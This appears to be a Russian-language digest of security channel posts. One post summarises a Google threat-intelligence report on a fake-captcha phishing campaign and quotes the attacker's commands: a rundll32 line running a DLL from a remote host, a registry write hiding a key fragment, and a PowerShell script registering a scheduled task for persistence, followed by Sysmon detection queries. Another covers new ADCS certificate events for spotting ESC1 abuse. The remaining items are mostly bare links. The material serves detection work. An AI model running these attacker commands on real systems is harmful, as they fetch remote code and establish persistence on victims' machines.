Fsecurity | HH

Всем привет! 💻✌️ Давайте познакомимся с отчетом Google TI Атака начинается с фишинга — ClickFix (Fake Captcha) Атакующие предлагают жертве выполнить удалённую DLL

rundll32.exe \\Ninspectguarantee.org\check\iamnotarobot.dll,humanCheck ;l'am not a robot

DLL используется для загрузки следующего этапа Отличительные особенности: 🔤 Установка Python для запуска скриптов 🔤 Регистрация собственного расширения в реестре для хранения части ключа шифрования

reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\.pietas" /v "ratio" /t REG_BINARY /d "f5e210ec114e1992b81ff89be58cfb2778005f734972239b9655b23fcee5593f19554d0a74dad52c67956781367b06e6" /f

🔤 Закрепление через планировщик задач

powershell -c "
$s = New-Object -ComObject Schedule.Service;
$s.Connect();
$t = $s.NewTask(0);
$p = $t.principal;
$p.logontype = 3;
$p.RunLevel = 0;
$a = $t.Actions.Create(0);
$a.Path = \"$env:APPDATA\Python38-64\pythonw.exe\";
$a.Arguments = \"$env:APPDATA\Python38-64\Lib\libsystemhealthcheck.py\";
$a.WorkingDirectory = \"$env:APPDATA\Python38-64\";
$tr = $t.Triggers.Create(9);
$tr.userID = \"$env:computername\"+\"\\\"+\"$env:username\";
$tr.enabled = $true;
$s.GetFolder(\"\").RegisterTaskDefinition(\"System health check\", $t, 6, $null, $null, 0) | Out-Null;"

🔤 Использование bitsadmin для загрузки .py-скриптов через BITS 🔭 Обнаружение: 🔤 Описание аномалий подсистемы BITS в моей статье на хакере и в PR 🔤 Запуск DLL с удалённых ресурсов

ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "rundll32.exe" and CommandLine match "^\s*\\\\" and CommandLine match "\.dll,"

ProviderName="Microsoft-Windows-Sysmon" and EventId=22 and Image endswith "rundll32.exe" and QueryName not match "^(?:[A-Za-z0-9-]+\.)*(?:company\.com|company\.loc|corp\.local)$"

🔤 Добавление новых расширений в ключ реестра HKEY_CURRENT_USER\SOFTWARE\Classes\ #detection@detectioneasy #ttp@detectioneasy

🔗Ссылка: https://spy-soft.net/proxifier-3-15-portable/

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/952616/

🔗Ссылка: https://habr.com/ru/articles/953484/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://github.com/wiire-a/pixiewps

🔗Ссылка: https://habr.com/ru/articles/953484/

🔗Ссылка: https://github.com/0x4D31/awesome-oscp

🔗Ссылка: https://www.securitylab.ru/news/564891.php

Релиз моего исследования о безопасности протокола Kerberos. Обнаружение атак на основе анализа сетевого трафика. Caster - Parallax Genre: Defensive Label: caster0x00.com Release Date: 21 October 2025 Language: English Length: 10476 Words Reading Time: 39 Minutes Performed by: Caster Written by: Mahama Bazarov Cover Man: Mahama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec) https://caster0x00.com/parallax

🔗Ссылка: https://opennet.ru/64093/

🔗Ссылка: https://habr.com/ru/companies/lansoft_career/articles/956730/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/958476/

🔗Ссылка: https://opennet.ru/64094/

Мы часто видим, что в различных статьях по детектированию техник повышения привилегий с использованием ADCS (ESC-атаки) авторы до сих пор используют старый формат событий запросов сертификатов в ADCS (события 4886—4889). Однако в этом году компания Microsoft обновила формат упомянутых событий, и обновлённая схема даёт намного больше возможностей для написания хантов. К сожалению, документации от Microsoft на эти события пока нет. Но несложно догадаться, какая информация содержится в каждом новом поле. На скриншоте выше показано, как выглядит событие 4886 при запросе сертификата с использованием ESC1-уязвимого шаблона утилитой certify. В обновлённом формате видно использованный шаблон, subjectAltName (SAN) в CSR, RequestClientInfo с пользователем, хостом и даже процессом из COM-объекта, использованный протокол для запроса (RPC или DCOM) и т.д. А вот как выглядит теперь событие 4887 при таком запросе:

Certificate Services approved a certificate request and issued a certificate. 

Request ID:        79 
Requester:        ESSOS\daenerys.targaryen 
Attributes:         
 
ccm:meereen.essos.local 
Disposition:        3 
SKI:  93 be 4b 84 64 d7 19 20 6e 94 82 4d 1f ed 86 a5 c1 2c 0e 09 
Subject:        CN=daenerys.targaryen, CN=Users, DC=essos, DC=local 
Subject Alternative Name: 
Other Name: 
     Principal Name=viserys.targaryen 

Certificate Template:        ESC1 
Serial Number:                200000004f317b974a5431d29a00000000004f 
Authentication Service:        Kerberos 
Authentication Level:        Privacy 
DCOMorRPC:                DCOM 

Здесь, помимо уже перечисленных полей, наконец-то появился Serial Number сертификата. Его можно использовать при поиске событий запроса TGT-билетов с выданным сертификатом (поле CertSerialNumber). К сожалению, до сих пор нет информации об IP-адресе клиента, ApplicationPolicy в запросе, SID Extension в выданном сертификате. Но даже с таким набором полей уже намного удобнее работать, и гораздо меньше необходимости обогащать события данными из БД ADCS. Рекомендуем обновить ваши ADCS-сервера, если вы ещё этого не сделали, и проверить, настроены ли ваши аудиты. А мы в следующем посте расскажем, как можно использовать новые поля в хантах для детектирования ESC-атак.

🔗 Ссылка: https://securitymedia.org/news/kitayskaya-gruppirovka-jewelbug-atakovala-rossiyskogo-it-provaydera-cherez-tsepochku-postavok.html

🔗Ссылка: https://xakep.ru/2025/10/20/adaptixc2-npm/

🔗Ссылка: https://www.securitylab.ru/news/564639.php

🔗Ссылка: https://www.securitylab.ru/news/564740.php

#soc #tools Windows Security Events Terminal 🔍 Комплексный инструмент, облегчающий поиск событий безопасности Windows и их фильтрацию. 🌟 Ознакомиться с исходниками утилиты можно по следующей ссылке.